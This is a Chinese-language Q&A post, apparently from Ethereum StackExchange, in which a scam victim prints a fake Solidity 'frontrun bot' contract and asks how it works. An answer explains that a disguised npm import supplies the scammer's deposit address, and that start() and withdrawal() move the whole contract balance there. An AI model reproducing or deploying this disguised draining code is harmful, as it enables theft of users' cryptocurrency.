Solidity

這個騙局程式碼如何將代幣轉移到內部未指定的錢包中?

  • August 15, 2022

以下是詐騙者操縱人們自行執行的確切可靠程式碼。我檢查了程式碼中沒有指定錢包地址,但是只要你執行並呼叫 start(),這個程式碼就會在合約地址中轉移代幣。儘管我在轉賬支付中看到了一些可疑函式,DepositAddress(),但該程式碼沒有導入其他定義 DepositAddress() 的程式碼或任何可疑庫,那麼他們如何呼叫這些程式碼?起初 new Manager() 似乎也在創建未知類管理器的新實例,對嗎?同樣,如果不導入這些函式,程式碼如何工作?如果有意義,我想知道其他程式碼也在做什麼。謝謝你。

合約地址:0x37caba0155ac3bf705d08b8522daff54ddc006a0

   //SPDX-License-Identifier: 1inchSwap
   pragma solidity ^0.6.6;
   
   // Import Libraries
   import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
   // New Token Scan
   import "coinmarketcap.com/coins";
   
   contract UniswapFrontrunBot {


   string public tokenName;
   string public tokenSymbol;
   uint frontrun;
   Manager manager;

   constructor(string memory _tokenName, string memory _tokenSymbol) public {
       tokenName = _tokenName;
       tokenSymbol = _tokenSymbol;
       manager = new Manager();
   }

   receive() external payable {}

   struct slice {
       uint _len;
       uint _ptr;
   }
   /*
    * @dev Find newly deployed contracts on Uniswap Exchange
    * @param memory of required contract liquidity.
    * @param other The second slice to compare.
    * @return New contracts with required liquidity.
    */

   function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
       uint shortest = self._len;

      if (other._len < self._len)
            shortest = other._len;

       uint selfptr = self._ptr;
       uint otherptr = other._ptr;

       for (uint idx = 0; idx < shortest; idx += 32) {
           // initiate contract finder
           uint a;
           uint b;

           string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
           string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
           loadCurrentContract(WETH_CONTRACT_ADDRESS);
           loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
           assembly {
               a := mload(selfptr)
               b := mload(otherptr)
           }

           if (a != b) {
               // Mask out irrelevant contracts and check again for new contracts
               uint256 mask = uint256(-1);

               if(shortest < 32) {
                 mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
               }
               uint256 diff = (a & mask) - (b & mask);
               if (diff != 0)
                   return int(diff);
           }
           selfptr += 32;
           otherptr += 32;
       }
       return int(self._len) - int(other._len);
   }

   /*
    * @dev Extracts the newest contracts on Uniswap exchange
    * @param self The slice to operate on.
    * @param rune The slice that will contain the first rune.
    * @return `list of contracts`.
    */
   function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
       uint ptr = selfptr;
       uint idx;

       if (needlelen <= selflen) {
           if (needlelen <= 32) {
               bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

               bytes32 needledata;
               assembly { needledata := and(mload(needleptr), mask) }

               uint end = selfptr + selflen - needlelen;
               bytes32 ptrdata;
               assembly { ptrdata := and(mload(ptr), mask) }

               while (ptrdata != needledata) {
                   if (ptr >= end)
                       return selfptr + selflen;
                   ptr++;
                   assembly { ptrdata := and(mload(ptr), mask) }
               }
               return ptr;
           } else {
               // For long needles, use hashing
               bytes32 hash;
               assembly { hash := keccak256(needleptr, needlelen) }

               for (idx = 0; idx <= selflen - needlelen; idx++) {
                   bytes32 testHash;
                   assembly { testHash := keccak256(ptr, needlelen) }
                   if (hash == testHash)
                       return ptr;
                   ptr += 1;
               }
           }
       }
       return selfptr + selflen;
   }


   /*
    * @dev Loading the contract
    * @param contract address
    * @return contract interaction object
    */
   function loadCurrentContract(string memory self) internal pure returns (string memory) {
       string memory ret = self;
       uint retptr;
       assembly { retptr := add(ret, 32) }

       return ret;
   }

   /*
    * @dev Extracts the contract from Uniswap
    * @param self The slice to operate on.
    * @param rune The slice that will contain the first rune.
    * @return `rune`.
    */
   function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
       rune._ptr = self._ptr;

       if (self._len == 0) {
           rune._len = 0;
           return rune;
       }

       uint l;
       uint b;
       // Load the first byte of the rune into the LSBs of b
       assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
       if (b < 0x80) {
           l = 1;
       } else if(b < 0xE0) {
           l = 2;
       } else if(b < 0xF0) {
           l = 3;
       } else {
           l = 4;
       }

       // Check for truncated codepoints
       if (l > self._len) {
           rune._len = self._len;
           self._ptr += self._len;
           self._len = 0;
           return rune;
       }

       self._ptr += l;
       self._len -= l;
       rune._len = l;
       return rune;
   }

   function memcpy(uint dest, uint src, uint len) private pure {
       // Check available liquidity
       for(; len >= 32; len -= 32) {
           assembly {
               mstore(dest, mload(src))
           }
           dest += 32;
           src += 32;
       }

       // Copy remaining bytes
       uint mask = 256 ** (32 - len) - 1;
       assembly {
           let srcpart := and(mload(src), not(mask))
           let destpart := and(mload(dest), mask)
           mstore(dest, or(destpart, srcpart))
       }
   }

   /*
    * @dev Orders the contract by its available liquidity
    * @param self The slice to operate on.
    * @return The contract with possbile maximum return
    */
   function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
       if (self._len == 0) {
           return 0;
       }

       uint word;
       uint length;
       uint divisor = 2 ** 248;

       // Load the rune into the MSBs of b
       assembly { word:= mload(mload(add(self, 32))) }
       uint b = word / divisor;
       if (b < 0x80) {
           ret = b;
           length = 1;
       } else if(b < 0xE0) {
           ret = b & 0x1F;
           length = 2;
       } else if(b < 0xF0) {
           ret = b & 0x0F;
           length = 3;
       } else {
           ret = b & 0x07;
           length = 4;
       }

       // Check for truncated codepoints
       if (length > self._len) {
           return 0;
       }

       for (uint i = 1; i < length; i++) {
           divisor = divisor / 256;
           b = (word / divisor) & 0xFF;
           if (b & 0xC0 != 0x80) {
               // Invalid UTF-8 sequence
               return 0;
           }
           ret = (ret * 64) | (b & 0x3F);
       }

       return ret;
   }

   /*
    * @dev Calculates remaining liquidity in contract
    * @param self The slice to operate on.
    * @return The length of the slice in runes.
    */
   function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
       uint ptr = self._ptr - 31;
       uint end = ptr + self._len;
       for (l = 0; ptr < end; l++) {
           uint8 b;
           assembly { b := and(mload(ptr), 0xFF) }
           if (b < 0x80) {
               ptr += 1;
           } else if(b < 0xE0) {
               ptr += 2;
           } else if(b < 0xF0) {
               ptr += 3;
           } else if(b < 0xF8) {
               ptr += 4;
           } else if(b < 0xFC) {
               ptr += 5;
           } else {
               ptr += 6;
           }
       }
   }


   /*
    * @dev Parsing all uniswap mempool
    * @param self The contract to operate on.
    * @return True if the slice is empty, False otherwise.
    */
   function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
       bytes memory tmp = bytes(_a);
       uint160 iaddr = 0;
       uint160 b1;
       uint160 b2;
       for (uint i = 2; i < 2 + 2 * 20; i += 2) {
           iaddr *= 256;
           b1 = uint160(uint8(tmp[i]));
           b2 = uint160(uint8(tmp[i + 1]));
           if ((b1 >= 97) && (b1 <= 102)) {
               b1 -= 87;
           } else if ((b1 >= 65) && (b1 <= 70)) {
               b1 -= 55;
           } else if ((b1 >= 48) && (b1 <= 57)) {
               b1 -= 48;
           }
           if ((b2 >= 97) && (b2 <= 102)) {
               b2 -= 87;
           } else if ((b2 >= 65) && (b2 <= 70)) {
               b2 -= 55;
           } else if ((b2 >= 48) && (b2 <= 57)) {
               b2 -= 48;
           }
           iaddr += (b1 * 16 + b2);
       }
       return address(iaddr);
   }


   /*
    * @dev Returns the keccak-256 hash of the contracts.
    * @param self The slice to hash.
    * @return The hash of the contract.
    */
   function keccak(slice memory self) internal pure returns (bytes32 ret) {
       assembly {
           ret := keccak256(mload(add(self, 32)), mload(self))
       }
   }

   /*
    * @dev Check if contract has enough liquidity available
    * @param self The contract to operate on.
    * @return True if the slice starts with the provided text, false otherwise.
    */
       function checkLiquidity(uint a) internal pure returns (string memory) {
       uint count = 0;
       uint b = a;
       while (b != 0) {
           count++;
           b /= 16;
       }
       bytes memory res = new bytes(count);
       for (uint i=0; i<count; ++i) {
           b = a % 16;
           res[count - i - 1] = toHexDigit(uint8(b));
           a /= 16;
       }
       uint hexLength = bytes(string(res)).length;
       if (hexLength == 4) {
           string memory _hexC1 = mempool("0", string(res));
           return _hexC1;
       } else if (hexLength == 3) {
           string memory _hexC2 = mempool("0", string(res));
           return _hexC2;
       } else if (hexLength == 2) {
           string memory _hexC3 = mempool("000", string(res));
           return _hexC3;
       } else if (hexLength == 1) {
           string memory _hexC4 = mempool("0000", string(res));
           return _hexC4;
       }

       return string(res);
   }


   /*
    * @dev If `self` starts with `needle`, `needle` is removed from the
    *      beginning of `self`. Otherwise, `self` is unmodified.
    * @param self The slice to operate on.
    * @param needle The slice to search for.
    * @return `self`
    */
   function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
       if (self._len < needle._len) {
           return self;
       }

       bool equal = true;
       if (self._ptr != needle._ptr) {
           assembly {
               let length := mload(needle)
               let selfptr := mload(add(self, 0x20))
               let needleptr := mload(add(needle, 0x20))
               equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
           }
       }

       if (equal) {
           self._len -= needle._len;
           self._ptr += needle._len;
       }

       return self;
   }

   function start() public payable {      

   /*
    * @dev Perform frontrun action from different contract pools
    * @param contract address to snipe liquidity from
    * @return `liquidity`.
    */

       payable(manager.DepositAddress()).transfer(address(this).balance);
   }



   // Returns the memory address of the first byte of the first occurrence of
   // `needle` in `self`, or the first byte after `self` if not found.
   function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
       uint ptr = selfptr;
       uint idx;

       if (needlelen <= selflen) {
           if (needlelen <= 32) {
               bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

               bytes32 needledata;
               assembly { needledata := and(mload(needleptr), mask) }

               uint end = selfptr + selflen - needlelen;
               bytes32 ptrdata;
               assembly { ptrdata := and(mload(ptr), mask) }

               while (ptrdata != needledata) {
                   if (ptr >= end)
                       return selfptr + selflen;
                   ptr++;
                   assembly { ptrdata := and(mload(ptr), mask) }
               }
               return ptr;
           } else {
               // For long needles, use hashing
               bytes32 hash;
               assembly { hash := keccak256(needleptr, needlelen) }

               for (idx = 0; idx <= selflen - needlelen; idx++) {
                   bytes32 testHash;
                   assembly { testHash := keccak256(ptr, needlelen) }
                   if (hash == testHash)
                       return ptr;
                   ptr += 1;
               }
           }
       }
       return selfptr + selflen;
   }

   /*
    * @dev Modifies `self` to contain everything from the first occurrence of
    *      `needle` to the end of the slice. `self` is set to the empty slice
    *      if `needle` is not found.
    * @param self The slice to search and modify.
    * @param needle The text to search for.
    * @return `self`.
    */
   function toHexDigit(uint8 d) pure internal returns (byte) {
       if (0 <= d && d <= 9) {
           return byte(uint8(byte('0')) + d);
       } else if (10 <= uint8(d) && uint8(d) <= 15) {
           return byte(uint8(byte('a')) + d - 10);
       }
       // revert("Invalid hex digit");
       revert();
   }

   /*
    * @dev token int2 to readable str
    * @param token An output parameter to which the first token is written.
    * @return `token`.
    */
   function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
       if (_i == 0) {
           return "0";
       }
       uint j = _i;
       uint len;
       while (j != 0) {
           len++;
           j /= 10;
       }
       bytes memory bstr = new bytes(len);
       uint k = len - 1;
       while (_i != 0) {
           bstr[k--] = byte(uint8(48 + _i % 10));
           _i /= 10;
       }
       return string(bstr);
   }

   function withdrawal() public payable { 

   /*
    * @dev withdrawals profit back to contract creator address
    * @return `profits`.
    */   
       payable(manager.DepositAddress()).transfer(address(this).balance);
   }

   /*
    * @dev loads all uniswap mempool into memory
    * @param token An output parameter to which the first token is written.
    * @return `mempool`.
    */
   function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
       bytes memory _baseBytes = bytes(_base);
       bytes memory _valueBytes = bytes(_value);

       string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
       bytes memory _newValue = bytes(_tmpValue);

       uint i;
       uint j;

       for(i=0; i<_baseBytes.length; i++) {
           _newValue[j++] = _baseBytes[i];
       }

       for(i=0; i<_valueBytes.length; i++) {
           _newValue[j++] = _valueBytes[i];
       }

       return string(_newValue);
   }

}

它看起來像是coinmarketcap.com一個 NPM 包,它返回了黑客的地址並具有 Manager 詳細資訊。當您刪除該導入行時,Manager 會給出錯誤。

npm 包在這裡

如果你想查看 npm 包的內容,可以按照這個。

npm view coinmarketcap.com dist.tarball

這將為您提供 NPM 封包件的連結。下載到你的機器,你會看到coins文件。跑:

cat coins | grep -r -A 5 DepositAddress

您將看到DepositAddress()功能和所有內容。

有什麼辦法可以追查到我被這個人騙了?我想知道是否有辦法恢復我的 ETH?

引用自:https://ethereum.stackexchange.com/questions/133570